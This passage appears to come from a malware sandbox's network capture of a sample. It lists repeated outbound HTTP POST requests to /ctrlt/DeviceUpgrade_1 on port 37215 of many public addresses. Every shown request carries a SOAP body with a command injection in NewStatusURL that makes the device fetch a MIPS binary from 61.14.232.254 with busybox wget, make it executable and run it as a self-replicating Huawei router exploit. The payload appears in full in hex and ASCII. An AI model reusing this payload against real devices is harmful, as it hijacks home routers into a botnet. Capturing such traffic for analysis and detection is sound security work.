20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2188192.168.2.134504841.17.66.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728996038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2189192.168.2.1338018197.116.202.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.729032993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2190192.168.2.1343126197.115.65.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.729054928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2191192.168.2.1340132180.91.6.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.729058027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192192.168.2.1340536197.118.28.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732105017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2193192.168.2.1334498157.21.12.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732172012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2194192.168.2.135266063.240.238.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732253075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2195192.168.2.135002431.82.118.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732253075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2196192.168.2.1353536197.150.105.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732302904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2197192.168.2.134426441.214.227.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732774973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2198192.168.2.133691841.29.40.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.732847929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
